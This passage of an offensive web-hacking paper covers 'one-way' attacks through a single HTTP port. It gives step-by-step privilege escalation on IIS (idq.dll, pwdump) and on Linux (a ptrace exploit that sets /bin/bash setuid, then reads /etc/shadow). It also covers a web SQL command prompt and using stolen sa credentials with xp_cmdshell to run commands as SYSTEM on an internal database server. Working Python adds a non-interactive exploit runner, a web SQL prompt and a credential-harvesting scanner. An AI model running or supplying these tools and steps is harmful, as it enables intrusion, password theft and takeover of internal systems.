6.0 One-Way Privilege Escalation
Web based command prompts, as discussed in section 4.0, inherit the privileges of the process under which they are running. Usually these are restricted, user level privileges, unless the web server process itself runs with elevated privileges; a few application servers that plug in to the front end web server do run elevated. To take the attack deeper, one would in most cases need some sort of privilege escalation after installing a web based command prompt and an HTTP file uploader.
Privilege escalation attacks are nothing new. There are many exploits for various operating systems which escalate privileges to either the super user or to a more privileged user, and most of them can be adapted to the one-way attack technique.
A detailed discussion of privilege escalation attacks is not within the scope of this paper. We shall discuss two examples of privilege escalation attacks, "Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability" [5] for the Windows and IIS platform, and the "Linux Ptrace/Setuid Exec Vulnerability" [6] for the Linux and Apache platform.
Care must be taken that the privilege escalation exploit runs non-interactively, i.e. it must not require an interactive shell, an interactive terminal, a GUI console, etc. Since the only channel back to the attacker is the HTTP response, the exploit should also not depend on its output being seen. For this example, we had to modify the Linux ptrace exploit to adapt it for one-way use.
6.1 Windows/IIS privilege escalation
Let us take the case of www1.example.com, which is a Windows 2000 server running IIS 5.0. We shall assume that it has already been compromised, and that a file uploader script upload.asp, as shown in section 5.0.1, is present on this server.
6.1.1 Uploading the Windows attack tools
We shall now upload a web based command prompt - cmdasp.asp, as explained in section 4.0.2 and two more binaries - idq.dll and pwdump.exe. idq.dll is a privilege escalation exploit which takes advantage of the Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability [5]. Upon invocation, it adds the IUSR_machinename and IWAM_machinename accounts to the Administrators group, thereby giving administrative privileges to all the processes and applications run under the IIS process, including the web based command prompt. pwdump.exe is a binary to dump the password hashes, and requires administrative privileges to run.
The screenshot below shows these three files being uploaded on www1.example.com.
We can check whether the files have been successfully uploaded using cmdasp.asp and running the "dir" command, as shown below:
We shall now check the members of the Administrators group, by issuing the command "net localgroup administrators" as shown below:
The only member of the Administrators group is the Administrator user.
6.1.2 idq.dll - privilege escalation
The next step is to attempt to invoke idq.dll, to escalate the privileges of the IUSR_machinename and IWAM_machinename accounts. The process is very simple. The following URL:
has to be accessed on the web server. No results are displayed; instead, the connection times out after a while. That by itself only suggests that the exploit ran; the real check is to look at the group membership again.
To verify if the attack has indeed succeeded, we shall now check the members of the Administrators group again, as shown below:
The IUSR_W2KVM and IWAM_W2KVM accounts are now members of the Administrators group. Therefore all commands executed via cmdasp.asp assume administrative privileges, as is demonstrated by running the pwdump.exe binary, shown below:
We now have full administrative control of www1.example.com.
6.2 Linux/Apache privilege escalation
For this example, we shall look at www2.example.com, which is a Linux server running a 2.4 kernel and Apache 1.3.27. As with the previous example, we shall assume that it has already been compromised, and that a file uploader script upload.cgi, as shown in section 5.0.2, is present on this server.
6.2.1 Uploading the Unix attack tools
For this server, we shall upload a web based command prompt - shell.cgi, as explained in section 4.0.1, and another file - ptrace1.c. ptrace1.c is a privilege escalation exploit based on the Linux Ptrace/Setuid Exec Vulnerability [6], slightly modified to adapt it for one-way use. When run successfully, the exploit applies the setuid permission to /bin/bash, which is owned by the root user, so that any command executed through /bin/bash runs with an effective uid of 0. The web based command prompt, shell.cgi, internally invokes /bin/bash, and therefore all commands executed via shell.cgi shall run as the root user. (Note that bash drops an inherited setuid euid back to the real uid unless it is started with -p, so whether this works depends on the bash build and on how shell.cgi invokes it; on the server used here it did work, as the "id" output below shows.)
The source code of the modified ptrace exploit is available here
The screenshots below show these two files being uploaded on www2.example.com.
We shall now compile ptrace1.c and check that it compiled properly. We shall also check our current privileges. The screenshot below shows the following commands executed via shell.cgi:
gcc -o ptrace1 ptrace1.c
ls -la
id
The privileges extended to shell.cgi are those of the "nobody" user.
6.2.2 ptrace1.c - privilege escalation
The next step is to execute ptrace1 and see whether it applies the setuid permission to /bin/bash. The exploit ptrace1.c internally executes the following command:
/bin/chmod 4755 /bin/bash
The screenshot below shows ptrace1 being executed and the file listing for /bin/bash:
Sure enough, the /bin/bash binary has the setuid permission applied to it.
The next screenshot shows two commands being executed:
id
cat /etc/shadow
Notice that the effective uid (euid) of the shell.cgi process is 0, which is that of the root user. The fact that we were able to view the contents of the /etc/shadow file proves that the privileges have been escalated.
We now have full super-user control of www2.example.com.
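The two escalations above share the same constraints: the exploit has to run with no terminal and no stdin, its output may never reach the attacker (the idq.dll request simply times out), and success has to be verified afterwards by inspecting state (group membership, the setuid bit on /bin/bash, euid in the output of "id"). The following is an added example, not code from the paper, of small helpers that implement those constraints for the Linux case; it assumes the web shell can run a Python interpreter on the compromised host, and the file names and log path are mine.

```python
"""Added example (not from the original paper): run a privilege
escalation step "one-way", i.e. non-interactively through a web based
command prompt, and check afterwards whether it worked.

Assumptions (mine, not the paper's): a Python interpreter is reachable
through the web shell, and the escalation leaves a setuid-root shell
behind, as the ptrace1 example does with /bin/chmod 4755 /bin/bash.
"""
import os
import stat
import subprocess
import sys


def run_oneway(argv, timeout=30, logfile=None):
    """Run argv with stdin closed and no controlling terminal, so an
    exploit that would wait for interactive input cannot hang the HTTP
    request forever. Output is captured (and optionally appended to a
    file on the host) because the HTTP response may time out before the
    exploit finishes, as the idq.dll example shows."""
    try:
        proc = subprocess.run(argv, stdin=subprocess.DEVNULL,
                              capture_output=True, timeout=timeout,
                              check=False)
        result = {"rc": proc.returncode, "timed_out": False,
                  "out": proc.stdout.decode(errors="replace"),
                  "err": proc.stderr.decode(errors="replace")}
    except subprocess.TimeoutExpired as exc:
        result = {"rc": None, "timed_out": True,
                  "out": (exc.stdout or b"").decode(errors="replace"),
                  "err": (exc.stderr or b"").decode(errors="replace")}
    if logfile:
        with open(logfile, "a") as fh:
            fh.write(repr(result) + "\n")
    return result


def has_setuid(path):
    """True when path carries the setuid bit (mode 4xxx), which is what
    the 's' in the owner field of 'ls -la /bin/bash' means."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def is_setuid_root(path):
    """The setuid bit only helps if the file is owned by root."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def parse_id_output(text):
    """Parse id(1) output such as
    'uid=99(nobody) gid=99(nobody) euid=0(root) groups=99(nobody)'
    into numeric ids; euid defaults to uid when id does not print it."""
    fields = {}
    for token in text.split():
        key, sep, value = token.partition("=")
        if sep and key in ("uid", "gid", "euid", "egid"):
            fields[key] = int(value.split("(")[0])
    fields.setdefault("euid", fields.get("uid"))
    return fields


def escalation_succeeded(id_text, shell="/bin/bash"):
    """The post-exploit check from the text: euid 0 in id output, or a
    setuid-root shell left behind for the next request to use."""
    return parse_id_output(id_text).get("euid") == 0 or is_setuid_root(shell)


if __name__ == "__main__":
    # assumed usage: python3 oneway.py ./ptrace1 (path is hypothetical)
    exploit = sys.argv[1:] or ["./ptrace1"]
    print(run_oneway(exploit, timeout=60, logfile="/tmp/oneway.log"))
    ident = run_oneway(["id"])["out"]
    print(ident.strip(), "->", "root" if escalation_succeeded(ident) else "not root")
```

Running it through shell.cgi as `python3 oneway.py ./ptrace1` performs the exploit and the verification in one request, which matters when each request may be the last one to get a response.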
7.0 Web based SQL Command Prompts
One-way hacking can be extended to areas other than file transfer and remote command execution via HTTP. One of the most important components in an application is the database. This section shows how we can extend the concept of one-way hacking to interactively control database servers, by creating what are called web based SQL command prompts.
Web based SQL command prompts allow a user to connect to a database server via an HTML interface, and execute SQL queries on the back-end database through an HTML form.
The web based SQL command prompt uses the same techniques as any database driven web application would use. Web programming languages such as PHP and ASP provide functionality to connect to back-end databases.
In many cases, once a web server has been compromised, an attacker would generally look at the source code and application configuration files hosted on the web server to figure out where the database lies, and the credentials to access it. This knowledge can be used when attacking a database using a web based SQL command prompt.
7.1 Anatomy of an SQL command prompt - sqlquery.asp
The image below shows an example of a web based SQL command prompt created using ASP.
There are five key input areas in this form:
Server Name: The symbolic name or IP address of the database server. In most cases, the database server is an entirely different system than the web server.
Database Name: The name of the database out of the collection of databases hosted on the database server.
User Name: The database user whose credentials will be used when establishing the database connection.
Password: Password for the database user. Generally, the database user and password are recovered from inspecting the application source code and configuration files hosted on the compromised web server.
Query String: The SQL query that is to be sent and executed on the database.
The other two parameters, Driver and Connection String, are used for selecting the proper driver and path for the database. Connection String is an optional parameter. In sqlquery.asp, we have the option of connecting via four drivers, namely Microsoft SQL Server, Oracle over ODBC, MySQL over ODBC and FoxPro. More drivers can be added very easily.
The source code for sqlquery.asp is given here. It is possible to create such web based SQL command prompts with languages such as PHP, Perl, JSP, etc.
(Thanks to Ketan Vyas for sqlquery.asp)
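To make the anatomy concrete in a language other than ASP, here is an added example (not the paper's sqlquery.asp, and not Ketan Vyas' code) of a minimal web based SQL command prompt in Python. It takes the same five inputs plus the Driver selector. Only sqlite3 is wired in as a driver so that the example runs offline; the other driver entries merely build the connection string an ODBC/OLE DB client would be handed, and the key names used there are my assumption, not something the paper specifies.

```python
"""Added example (not sqlquery.asp): a minimal web based SQL command
prompt. The sqlite driver is real so the code runs offline; the other
drivers only produce a connection string (assumed key names)."""
import html
import sqlite3
from urllib.parse import parse_qs
from wsgiref.simple_server import make_server


def build_connection_string(driver, server, database, user, password):
    """Map the form's Driver field to a connection string. The key names
    are conventional ADO/ODBC ones and are an assumption of this example."""
    if driver == "mssql":
        return (f"Provider=SQLOLEDB;Data Source={server};"
                f"Initial Catalog={database};User Id={user};Password={password}")
    if driver in ("mysql_odbc", "oracle_odbc"):
        return f"DSN={server};DATABASE={database};UID={user};PWD={password}"
    if driver == "sqlite":
        return server            # a file path, or ":memory:"
    raise ValueError(f"unknown driver {driver!r}")


def run_query(conn, query):
    """Execute one statement and return (column names, rows). SELECTs
    return a result set; for DML/DDL the affected row count is returned."""
    cur = conn.cursor()
    cur.execute(query)
    if cur.description:
        return [d[0] for d in cur.description], cur.fetchall()
    conn.commit()
    return ["rows_affected"], [(cur.rowcount,)]


def render_result(columns, rows):
    """Escape every cell: data pulled from a hostile database must not be
    able to inject script into the browser running the prompt."""
    head = "".join(f"<th>{html.escape(str(c))}</th>" for c in columns)
    body = "".join(
        "<tr>" + "".join(f"<td>{html.escape(str(v))}</td>" for v in r) + "</tr>"
        for r in rows)
    return f"<table><tr>{head}</tr>{body}</table>"


FORM = """<form method="post">
Driver: <select name="driver"><option>sqlite</option><option>mssql</option>
<option>mysql_odbc</option><option>oracle_odbc</option></select><br>
Server Name: <input name="server"><br>
Database Name: <input name="database"><br>
User Name: <input name="user"><br>
Password: <input name="password" type="password"><br>
Query String: <textarea name="query"></textarea><br>
<input type="submit" value="Run">
</form>"""


def handle_form(fields, conn=None):
    """Core of the prompt. fields is the submitted form as a dict; conn
    lets a caller pass an already opened connection (used by the test).
    Without one, only the sqlite driver is wired in here."""
    driver = fields.get("driver", "sqlite")
    if conn is None:
        if driver != "sqlite":
            return f"<pre>driver {html.escape(driver)} not wired in this example</pre>"
        conn = sqlite3.connect(build_connection_string(
            driver, fields.get("server", ":memory:"), fields.get("database", ""),
            fields.get("user", ""), fields.get("password", "")))
    try:
        return render_result(*run_query(conn, fields.get("query", "")))
    except Exception as exc:      # surface the DB error to the attacker
        return f"<pre>{html.escape(str(exc))}</pre>"


def app(environ, start_response):
    """WSGI entry point: GET shows the form, POST runs the query."""
    body = FORM
    if environ["REQUEST_METHOD"] == "POST":
        size = int(environ.get("CONTENT_LENGTH") or 0)
        raw = environ["wsgi.input"].read(size).decode()
        fields = {k: v[0] for k, v in parse_qs(raw).items()}
        body = FORM + handle_form(fields)
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [body.encode()]


if __name__ == "__main__":
    make_server("127.0.0.1", 8080, app).serve_forever()
```

The output escaping is the one check worth keeping even in throwaway tooling: the prompt is rendered in the attacker's own browser, and a table cell from a database that someone else controls is untrusted input.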
7.2 An example - IIS and MS SQL server
We now present a scenario showing how sqlquery.asp can be used in hacking database servers which lie on an internal network. The diagram below shows the application layout of the web server, www1.example.com, and the database server 10.0.1.2.
We assume that www1.example.com has already been compromised and a web based file uploader, upload.asp, and a web based command prompt, cmdasp.asp are present on it. We make no assumptions about privilege escalation.
We shall now upload sqlquery.asp on www1.example.com, and use it to attack the database server on 10.0.1.2.
7.3 Uploading sqlquery.asp
The screenshot below shows sqlquery.asp being uploaded by the file uploader, upload.asp, on to www1.example.com
7.4 Pilfering the web application
Before we can connect to the back-end database, we need to know how to establish a connection to the database, and with what credentials. Upon inspecting the source code of the web application hosted on www1.example.com, the following lines were found:
Set Con = Server.CreateObject("ADODB.Connection")
Con.Open "Provider=SQLOLEDB; Data Source=10.0.1.2; Initial Catalog=art; User Id=sa; Password=sys+adm!n"
Set RS = Con.Execute("select StockNumber,Name,Description,Artist,ListPrice,image from PRODUCTS where ID = " + Request.QueryString("ID"))
These lines from the application source code provide us with everything needed to connect to the back-end database server on 10.0.1.2: the provider, the server address, the database name ("art") and the credentials, which here are those of the sa account.
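Reading every source file by hand through a web based command prompt is slow, so the pilfering step is usually scripted. The following is an added example, not code from the paper, that scans a document root for ADO/ODBC style connection strings and PHP mysql_connect calls and reports the credentials found. The ASP sample inside it is constructed for this example, modelled on the lines quoted above; the PHP sample and the set of recognised key names are my assumptions about what other applications look like.

```python
"""Added example, not from the paper: pull database credentials out of
web application source and configuration files. The sample sources are
constructed for this example."""
import re
from pathlib import Path

SAMPLE_ASP = '''
Set Con = Server.CreateObject("ADODB.Connection")
Con.Open "Provider=SQLOLEDB; Data Source=10.0.1.2; Initial Catalog=art; User Id=sa; Password=sys+adm!n"
Set RS = Con.Execute("select StockNumber from PRODUCTS where ID = " + Request.QueryString("ID"))
'''
SAMPLE_PHP = '''
<?php $link = mysql_connect("10.0.1.3", "appuser", "s3cret"); ?>
'''

# connection-string keys as used by ADO/ODBC, mapped to one vocabulary
KEY_ALIASES = {
    "provider": "provider", "driver": "provider",
    "data source": "server", "server": "server", "dsn": "server", "host": "server",
    "initial catalog": "database", "database": "database",
    "user id": "user", "uid": "user", "user": "user",
    "password": "password", "pwd": "password",
}
STRING_LITERAL = re.compile(r'"([^"\n]+)"')
PHP_CONNECT = re.compile(
    r'mysqli?_connect\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"')


def parse_connection_string(text):
    """Turn 'Key=Value; Key=Value' into a dict with canonical key names.
    Only the first '=' splits key from value, so a password containing
    '=' survives; one containing ';' would not."""
    out = {}
    for part in text.split(";"):
        key, sep, value = part.partition("=")
        if not sep:
            continue
        canon = KEY_ALIASES.get(key.strip().lower())
        if canon:
            out[canon] = value.strip()
    return out


def find_credentials(source):
    """Return every credential set found in one file's contents. A hit
    needs a server plus a user or password, which keeps ordinary SQL text
    and HTML attributes out of the report."""
    hits = []
    for literal in STRING_LITERAL.findall(source):
        fields = parse_connection_string(literal)
        if "server" in fields and ("user" in fields or "password" in fields):
            hits.append(fields)
    for host, user, password in PHP_CONNECT.findall(source):
        hits.append({"provider": "mysql", "server": host,
                     "user": user, "password": password})
    return hits


def scan_tree(root, extensions=(".asp", ".php", ".inc", ".config", ".ini")):
    """Walk a document root and report credentials per file."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in extensions:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            hits = find_credentials(text)
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."   # e.g. C:\Inetpub\wwwroot
    for filename, creds in scan_tree(root).items():
        print(filename, creds)
```

Run through the web shell with the document root as its argument; the output is exactly the server, database, user and password fields that sqlquery.asp asks for.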
7.5 Executing SQL queries via sqlquery.asp
Using the above credentials with sqlquery.asp, it is possible to execute arbitrary SQL statements on the database server. The screenshot below shows the results of the query "SELECT * FROM SYSDATABASES;":
The next screenshot shows application data being displayed from a table called PRODUCTS, hosted on the "art" database:
7.6 Executing stored procedures
The SQL command prompt can also be used for executing stored procedures. In this example, we are accessing the back-end database with system administrator (sa) privileges. Therefore it is possible to execute extended stored procedures such as "xp_cmdshell", which runs arbitrary operating system commands on the database server.
The screenshot below shows the "ipconfig" command being run on the database server via the "xp_cmdshell" stored procedure:
We have achieved remote command execution on an internal server which is not accessible from the outside!
In fact, with this same example, we have also achieved privilege escalation on the database server. Commands run through xp_cmdshell execute in the security context of the SQL Server service account, and connecting as sa is what entitles us to invoke it. A quick check by running "whoami.exe" shows what privileges we get:
The above screenshot verifies that we indeed have administrative privileges: the commands run as "NT AUTHORITY\SYSTEM", i.e. the SQL Server service on 10.0.1.2 is running as LocalSystem.
8.0 Concluding thoughts
One-way hacks illustrate the fact that firewalls are not enough to protect a web application. A tight firewall can make things difficult for an attacker, but it does not keep the attacker out entirely. In fact, with tools like the file uploader, the web based command prompt and the web based SQL command prompt, it is just as easy to attack a web application and the underlying network with a tight firewall in place, because everything travels over the one port the firewall has to allow.
SSL makes things even worse [8], from the point of view of securing the application. Many people think that SSL prevents such attacks. It does not. SSL is used only to encrypt the data between the web browser and the web server, to prevent eavesdropping. SSL provides no security to the web application, or the underlying network. All one-way hacks can be easily adapted to SSL, using libraries such as OpenSSL.
I hope everybody is interested in this subject.
With my greetings,
Created By : *-..-* DaRk EvIl *-..-*